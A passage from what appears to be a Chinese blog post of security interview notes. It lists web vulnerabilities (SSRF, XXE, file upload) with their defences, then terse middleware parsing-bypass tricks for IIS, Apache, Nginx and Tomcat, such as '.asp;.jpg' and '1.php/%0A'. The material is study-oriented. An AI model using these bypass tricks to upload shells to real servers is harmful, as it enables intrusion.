Check（HTTPS跳转到HTTP不会发送Referer）</span><br><span class="line">	Anti CSRF Token</span><br><span class="line">4.SSRF</span><br><span class="line">	原理：利用漏洞伪造服务器端发起请求，从而突破客户端获取不到数据限制，一般用来在外网探测或攻击内网服务</span><br><span class="line">	防御：</span><br><span class="line">	对url参数进行过滤，过滤返回信息</span><br><span class="line">	限制请求端口为http常用的端口</span><br><span class="line">	内网IP黑名单</span><br><span class="line">	禁用不需要的协议</span><br><span class="line">5.XXE</span><br><span class="line">	原理：应用程序解析XML输入时，没有禁止DTD引用外部实体的加载，导致可加载恶意外部文件</span><br><span class="line">	防御：</span><br><span class="line">	使用开发语言提供的禁用外部实体的方法</span><br><span class="line">	过滤用户提交的XML数据，过滤关键词：&lt;!DOCTYPE和&lt;!ENTITY，或者SYSTEM和PUBLIC。</span><br><span class="line">6.文件上传</span><br><span class="line">	原理：没有对上传文件进行过滤导致用户可以上传shell</span><br><span class="line">	防御：</span><br><span class="line">		文件扩展名服务端白名单校验。</span><br><span class="line">		文件内容服务端校验。</span><br><span class="line">		上传文件重命名。</span><br><span class="line">        隐藏上传文件路径。</span><br><span class="line">        文件上传的目录设置为不可执行</span><br><span class="line">        单独设置文件服务器的域名</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">1.IIS</span><br><span class="line">  6.x 解析漏洞</span><br><span class="line">	.asp文件夹下的文件会解析为asp</span><br><span class="line">	.asp;.jpg文件会被解析为asp</span><br><span class="line">  7.x 解析漏洞</span><br><span class="line">  	.jpg后加上/.php会将jpg文件解析为php</span><br><span class="line">  PUT任意文件写入</span><br><span class="line">  	开启WevDav之后如果有写入权限会造成任意文件写入</span><br><span class="line">  短文件名猜解</span><br><span class="line">2.Apache</span><br><span class="line">  未知后缀解析漏洞</span><br><span class="line">  	.php.xxx1.xxx2，从右往左解析</span><br><span class="line">  后缀换行漏洞</span><br><span class="line">  	1.php/%0A会被解析为php</span><br><span class="line">  ADDhandle配置错误 配置处理器</span><br><span class="line">3.Nginx</span><br><span class="line">  配置错误导致解析漏洞/.php</span><br><span class="line">  空字符任意命令执行</span><br><span class="line">  文件名逻辑漏洞</span><br><span class="line">  	文件名后加空格</span><br><span class="line">  配置错误</span><br><span class="line">  	目录穿越:配置alias的时候没有/</span><br><span class="line">  	目录遍历：autoindex=o</span><br><span class="line">  	LR注入漏洞：url解析换行</span><br><span class="line">4.tomcat</span><br><span class="line">  弱口令</span><br><span class="line">  远程代码执行：函数在windows上和linux的实现不同</span><br></pre></td></tr></table></figure>


        </div>

        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/%E9%9D%A2%E7%BB%8F/">#面经</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/02/22/PHP_deobf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">PHP_Deobf源码分析</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span>
              -
            
            2022&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">L2ksy0d</a>
        </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.5</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%98%E5%87%86%E5%A4%87"><span class="nav-text">面试问题准备</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%81%87%E5%A6%82%E7%BB%99%E4%BD%A0%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E4%BD%A0%E6%80%8E%E4%B9%88%E5%8E%BB%E6%B8%97%E9%80%8F"><span class="nav-text">假如给你一个网站你怎么去渗透</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#whois%E6%9F%A5%E8%A9%A2%E4%B8%BB%E8%A6%81%E6%9F%A5%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-text">whois查詢主要查的是什么?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap%E5%91%BD%E4%BB%A4"><span class="nav-text">nmap命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84web%E5%AE%B9%E5%99%A8"><span class="nav-text">常见的web容器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="nav-text">常见中间件漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3%E5%8F%8A%E5%AF%B9%E5%BA%94%E6%9C%8D%E5%8A%A1"><span class="nav-text">常见端口及对应服务</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL%E5%92%8CNoSQL%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9"><span class="nav-text">SQL和NoSQL的优缺点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AB%AF%E5%8F%A3"><span class="nav-text">常见数据库端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%88%86%E7%B1%BB"><span class="nav-text">SQL注入的分类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#load-file%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E6%9C%89%E8%AF%BB%E5%86%99%E6%9D%83%E9%99%90"><span class="nav-text">load_file判断是否有读写权限</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql5-0%E4%B8%8A%E4%B8%8B%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB"><span class="nav-text">mysql5.0上下有什么区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MySQL%E4%B8%AD-%E5%92%8C-%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="nav-text">MySQL中@和@@的区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MySQL%E7%BB%95%E8%BF%87%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="nav-text">MySQL绕过常用函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8D%B1%E5%AE%B3%E5%92%8C%E4%BF%AE%E5%A4%8D"><span class="nav-text">SQL注入的危害和修复</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%86%99%E5%85%A5webshell%E7%9A%84%E6%9D%A1%E4%BB%B6%E5%92%8C%E6%96%B9%E5%BC%8F"><span class="nav-text">SQL注入写入webshell的条件和方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E8%BF%87%E6%BB%A4%E4%BA%86%E9%80%97%E5%8F%B7"><span class="nav-text">sql注入过滤了逗号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sleep%E8%A2%AB%E7%A6%81%E7%94%A8%E5%90%8E%E8%BF%98%E8%83%BD%E6%80%8E%E4%B9%88%E8%BF%9B%E8%A1%8Csql%E6%B3%A8%E5%85%A5%EF%BC%88%E5%BB%B6%E6%97%B6%E5%87%BD%E6%95%B0%E9%83%BD%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F%EF%BC%89"><span class="nav-text">sleep被禁用后还能怎么进行sql注入（延时函数都有哪些？）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Select%E8%A2%AB%E8%BF%87%E6%BB%A4%E6%80%8E%E4%B9%88%E5%8A%9E"><span class="nav-text">Select被过滤怎么办</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8%E5%85%B3%E9%94%AE%E7%9A%84%E8%A1%A8%E8%A2%AB%E8%BF%87%E6%BB%A4%E4%BA%86%EF%BC%8C%E8%AF%A5%E6%80%8E%E4%B9%88%E5%8A%9E"><span class="nav-text">盲注关键的表被过滤了，该怎么办</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E8%A7%81%E7%9A%84%E8%BF%87WAF%E6%96%B9%E6%B3%95"><span class="nav-text">sql注入常见的过WAF方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Mysql-UDF%E6%8F%90%E6%9D%83"><span class="nav-text">Mysql UDF提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E4%B8%8D%E5%90%8C%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-text">SQL注入如何判断不同数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%84%E7%BC%96%E8%AF%91%E6%98%AF%E5%90%A6100-%E8%83%BD%E9%98%B2%E5%BE%A1SQL%E6%B3%A8%E5%85%A5"><span class="nav-text">预编译是否100%能防御SQL注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%91%E7%8E%B0-demo-jsp-uid-110-%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C%E4%BD%A0%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%80%9D%E8%B7%AF%E8%8E%B7%E5%8F%96-webshell"><span class="nav-text">发现 demo.jsp?uid&#x3D;110 注入点，你有哪几种思路获取 webshell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS"><span class="nav-text">XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS%E7%9A%84%E5%88%86%E7%B1%BB"><span class="nav-text">XSS的分类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E9%A2%84%E9%98%B2XSS"><span class="nav-text">如何预防XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS%E5%92%8CCSRF%E3%80%81SSRF%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="nav-text">XSS和CSRF、SSRF的区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%99%A4%E4%BA%86alert%E5%87%BD%E6%95%B0%EF%BC%8C%E8%BF%98%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E5%BC%B9%E7%AA%97"><span class="nav-text">除了alert函数，还可以使用哪些函数弹窗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="nav-text">绕过方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF"><span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFCSRF"><span class="nav-text">什么是CSRF</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF%E7%9A%84%E9%A2%84%E9%98%B2"><span class="nav-text">CSRF的预防</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSRF"><span class="nav-text">SSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SSRF%E5%BD%A2%E6%88%90%E7%9A%84%E5%8E%9F%E5%9B%A0"><span class="nav-text">SSRF形成的原因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSRF%E7%BB%95%E8%BF%87"><span class="nav-text">SSRF绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSRF%E7%9A%84%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="nav-text">SSRF的利用方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSRF%E9%A2%84%E9%98%B2"><span class="nav-text">SSRF预防</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XXE"><span class="nav-text">XXE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E"><span class="nav-text">越权漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B0%B4%E5%B9%B3%E8%B6%8A%E6%9D%83%E5%92%8C%E5%9E%82%E7%9B%B4%E8%B6%8A%E6%9D%83"><span class="nav-text">水平越权和垂直越权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E%E9%80%9A%E5%B8%B8%E5%87%BA%E7%8E%B0%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="nav-text">越权漏洞通常出现的位置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E%E9%A2%84%E9%98%B2%E6%8E%AA%E6%96%BD"><span class="nav-text">越权漏洞预防措施</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-text">文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E7%BB%95%E8%BF%87%E6%89%8B%E6%B3%95"><span class="nav-text">常用绕过手法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP%E7%88%86%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-text">PHP爆绝对路径的方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-text">文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP%E4%B8%AD%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%87%BD%E6%95%B0%E5%8F%8A%E5%85%B6%E7%89%B9%E7%82%B9"><span class="nav-text">PHP中文件包含函数及其特点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E8%B7%AF%E5%BE%84"><span class="nav-text">常见的敏感信息路径</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#session%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-text">session文件包含漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%B8%B8%E7%94%A8%E7%BB%95%E8%BF%87"><span class="nav-text">文件包含常用绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="nav-text">PHP伪协议</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="nav-text">命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="nav-text">常见危险函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%A1%88"><span class="nav-text">修复方案</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81web%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E3%80%81%E9%98%B2%E5%BE%A1%E5%8A%9E%E6%B3%95"><span class="nav-text">常见web漏洞原理、防御办法</span></a></li></ol></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>



    
<script src="/js/local-search.js"></script>




    
<script src="/js/code-copy.js"></script>




    
<script src="/js/lazyload.js"></script>



<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
